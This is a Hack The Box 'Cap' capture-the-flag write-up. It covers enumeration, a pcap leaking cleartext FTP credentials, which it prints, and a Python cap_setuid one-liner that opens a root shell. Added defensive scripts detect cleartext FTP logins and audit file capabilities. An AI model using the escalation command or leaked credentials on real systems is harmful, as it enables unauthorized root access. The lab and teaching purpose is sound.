HTB Cap Writeup (ENG)


#HTB Writeup Hack Linux English

2021 Oct 05: 17:28

Enumeration

First of all we scan the target with nmap, e.g. nmap -sV -T4 -p21,22,80 cap.htb. The result is:

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol
80/tcp open  http    gunicorn

On port 80 there is a static dashboard with some information, but there is nothing to interact with, so we enumerate the website, for example with ffuf -u http://cap.htb/FUZZ -w ~/hax/SecLists/Discovery/Web-Content/common.txt. An important hit is the /download directory. We could enumerate it too, but we can simply go to http://cap.htb/download/0, because every array starts at 0; this lets us download a 0.pcap file. Open it with Wireshark and you will see an FTP transfer.

Getting user

In this transfer we see someone logging into the target machine through FTP with the credentials nathan:Buck3tH4TF0RM3!. The same credentials work for SSH as well. SSH into the target machine and, as we see, user.txt is right there: we have the user flag.
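The capture gives up the password so easily because the FTP control channel is plain text. As an added example (not part of the original writeup), the script below takes a control-channel conversation as Wireshark's Follow TCP Stream view shows it and flags cleartext logins the way a network-monitoring check would, recording only the password length so the finding can be logged without copying the secret. The session text is constructed; it is not the real 0.pcap.

```python
"""Detect cleartext FTP logins in a captured control-channel conversation.

Added example for this writeup (not from the original post). The input is
the text of the FTP control channel as Wireshark's "Follow TCP Stream"
shows it, with "C:"/"S:" prefixes marking client and server lines. The
sample below is constructed; it is not the real capture.
"""
import re
from typing import Any, Dict, List, Optional

# Constructed sample FTP control-channel conversation.
SAMPLE_FTP_SESSION = """\
S: 220 (vsFTPd 3.0.3)
C: USER nathan
S: 331 Please specify the password.
C: PASS placeholder-not-the-real-one
S: 230 Login successful.
C: SYST
S: 215 UNIX Type: L8
C: USER guest
S: 331 Please specify the password.
C: PASS wrong
S: 530 Login incorrect.
C: QUIT
S: 221 Goodbye.
"""

USER_RE = re.compile(r"^C:\s*USER\s+(\S+)$", re.IGNORECASE)
PASS_RE = re.compile(r"^C:\s*PASS\s+(\S+)$", re.IGNORECASE)
ACCEPTED_RE = re.compile(r"^S:\s*230\b")
REJECTED_RE = re.compile(r"^S:\s*530\b")


def find_cleartext_logins(session: str) -> List[Dict[str, Any]]:
    """One record per USER command: who logged in, whether a cleartext
    PASS followed, how long the password was (never the password itself)
    and whether the server accepted it (230) or rejected it (530)."""
    findings: List[Dict[str, Any]] = []
    current: Optional[Dict[str, Any]] = None
    for raw in session.splitlines():
        line = raw.strip()
        m = USER_RE.match(line)
        if m:
            current = {"user": m.group(1), "cleartext_pass": False,
                       "pass_len": 0, "accepted": False}
            findings.append(current)
            continue
        if current is None:
            continue
        m = PASS_RE.match(line)
        if m:
            current["cleartext_pass"] = True
            current["pass_len"] = len(m.group(1))
        elif ACCEPTED_RE.match(line):
            current["accepted"] = True
        elif REJECTED_RE.match(line):
            current["accepted"] = False
    return findings


def report(session: str) -> List[str]:
    """One alert line per login attempt, safe to paste into an IR note."""
    out = []
    for f in find_cleartext_logins(session):
        verdict = "ACCEPTED" if f["accepted"] else "rejected"
        out.append(f"cleartext FTP login as '{f['user']}' "
                   f"(password {f['pass_len']} chars) {verdict}")
    return out


if __name__ == "__main__":
    for line in report(SAMPLE_FTP_SESSION):
        print(line)
```

The same check applied to this box would have shown two things a defender cares about: that FTP was sending passwords in the clear, and that a packet capture containing such a session was being served over HTTP without authentication. Either finding on its own is enough to require rotating nathan's password.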

Rooting

First we upload LinPEAS to the target machine. From the folder containing linpeas.sh, run scp linpeas.sh nathan@cap.htb:/tmp and enter nathan's password. Then run chmod +x linpeas.sh && ./linpeas.sh. The script shows a lot of information, but the only part we need is the "Files with capabilities" section.

Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

If we can't find this part, we can also run getcap -r / 2>/dev/null, which lists the same thing. The python3.8 binary has cap_setuid, and this is vulnerable: a process holding that capability may switch its UID to 0 without being root. We have to research a bit for an exploitation method. There is a good example.
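To see why the listing above is a real finding and not just noise, here is an added example (not from the original writeup or from LinPEAS) that audits getcap -r / output the way a hardening check would: it parses each path = caps+flags line, flags root-equivalent capabilities, and treats cap_setuid on an interpreter as critical. The input is constructed to mirror the listing above.

```python
"""Audit `getcap -r /` output for file capabilities that grant root.

Added example for this writeup; it is not from the original post or from
LinPEAS. It parses the "path = caps+flags" lines getcap prints and flags
binaries whose capability set lets an unprivileged user escalate, above
all cap_setuid on an interpreter. The sample output is constructed to
mirror the listing in the writeup.
"""
import re
from dataclasses import dataclass
from typing import List

# Constructed sample in `getcap -r /` format.
SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

# Capabilities that amount to root when held by a program an unprivileged
# user can drive with code or arguments of their choosing.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_setfcap",
}

# Programs that run arbitrary user-supplied code; a root-equivalent
# capability on one of these is directly exploitable.
INTERPRETER_RE = re.compile(
    r"/(python[\d.]*|perl[\d.]*|ruby[\d.]*|php[\d.]*|node|bash|sh|dash|zsh|vim|nano|gdb)$"
)

# One getcap line: "<path> = cap_a,cap_b+eip"
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=\s*(?P<caps>[\w,]+)\+(?P<flags>[eip]+)\s*$")


@dataclass
class CapFinding:
    path: str
    caps: List[str]
    flags: str
    severity: str  # "critical", "review" or "ok"
    reason: str


def classify(path: str, caps: List[str], flags: str) -> CapFinding:
    risky = sorted(ROOT_EQUIVALENT & set(caps))
    # +e means the capability is live as soon as the binary starts;
    # +p alone means the program must raise it itself.
    effective = "e" in flags
    if risky and INTERPRETER_RE.search(path):
        return CapFinding(
            path, caps, flags, "critical",
            f"{','.join(risky)} on an interpreter; any user who can run it can act "
            f"as root ({'effective on exec' if effective else 'permitted only'})")
    if risky:
        return CapFinding(
            path, caps, flags, "review",
            f"{','.join(risky)} granted; confirm the program cannot be made to run "
            "caller-controlled code")
    return CapFinding(path, caps, flags, "ok", "no root-equivalent capability")


def parse_getcap(text: str) -> List[CapFinding]:
    """Parse getcap output; lines that do not match the format are skipped."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        caps = m.group("caps").lower().split(",")
        findings.append(classify(m.group("path"), caps, m.group("flags")))
    return findings


def audit(text: str) -> List[CapFinding]:
    """Findings ordered worst first, so the top line is what to fix."""
    order = {"critical": 0, "review": 1, "ok": 2}
    return sorted(parse_getcap(text), key=lambda f: order[f.severity])


if __name__ == "__main__":
    for f in audit(SAMPLE_GETCAP):
        print(f"[{f.severity:8}] {f.path}: {f.reason}")
```

On this box the fix is to drop the capability set with setcap -r /usr/bin/python3.8, since the interpreter never needs it; more generally, cap_setuid belongs on a small, audited helper binary, never on anything that executes caller-supplied code. Running this audit from a cron job or configuration-management check catches the mistake before a pentester does.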

So we run the following command to get root privileges:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

As we see, we now have root privileges and can read the /root/root.txt file. We've rooted the box. Happy Hacking!